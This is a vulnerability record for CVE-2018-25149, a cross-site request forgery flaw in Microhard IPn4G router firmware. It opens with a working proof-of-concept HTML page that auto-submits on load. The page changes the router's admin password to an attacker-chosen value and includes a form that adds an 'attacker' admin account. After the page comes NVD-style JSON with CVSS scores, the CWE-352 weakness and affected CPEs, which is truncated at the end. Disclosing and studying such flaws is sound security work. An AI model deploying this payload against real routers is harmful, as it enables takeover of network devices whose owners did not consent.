CVE-2018-25149

<!-- CSRF PoC for CVE-2018-25149 - Change Admin Password --> <html> <body> <h1>CVE-2018-25149 CSRF Attack PoC</h1> <p>Target: Microhard IPn4G 1.1.0 Router Admin Interface</p> <!-- Change Admin Password --> <form action="http://TARGET_IP/goform/setPwd" method="POST" id="csrfForm"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="oldpassword" value="original_password" /> <input type="hidden" name="newpassword" value="AttackerControlled123!" /> <input type="hidden" name="confirmpassword" value="AttackerControlled123!" /> </form> <!-- Add New Admin User --> <form action="http://TARGET_IP/goform/addUser" method="POST" id="addUserForm"> <input type="hidden" name="newuser" value="attacker" /> <input type="hidden" name="newpass" value="attacker_pwd" /> <input type="hidden" name="privilege" value="admin" /> </form> <script> // Auto-submit forms when page loads document.getElementById('csrfForm').submit(); // document.getElementById('addUserForm').submit(); </script> <p>If you see this, the attack forms have been submitted.</p> </body> </html>

{"cve": {"id": "CVE-2018-25149", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:49.517", "lastModified": "2026-01-26T16:15:53.517", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microhard Systems IPn4G 1.1.0 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to change admin passwords, add new users, and modify system settings by tricking authenticated users into loading a specially crafted page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4g_firmware:1.1.0:build1098:*:*:*:*:*:*", "matchCriteriaId": "D3EFDC3E-8C6F-4418-9045-79D20D9E4EA1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4g:-:*:*:*:*:*:*:*", "matchCriteriaId": "00615A52-B793-4A62-83B0-960F5FE2C7A4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn3gb_firmware:2.2.0:build2160:*:*:*:*:*:*", "matchCriteriaId": "BF5C7674-E51C-4E63-B71F-FE42E4418778"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn3gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "52DB6EA5-3543-4883-B632-F23932C09587"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.6:build1184-14:*:*:*:*:*:*", "matchCriteriaId": "101F7459-230B-4773-9338-908F9F90D469"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "65C85AE1-505D-47A3-92BF-7D3276EF042D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1090-2:*:*:*:*:*:*", "matchCriteriaId": "7C7B4335-4C17-4571-A427-C215D9E8B02E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "65C85AE ... (truncated)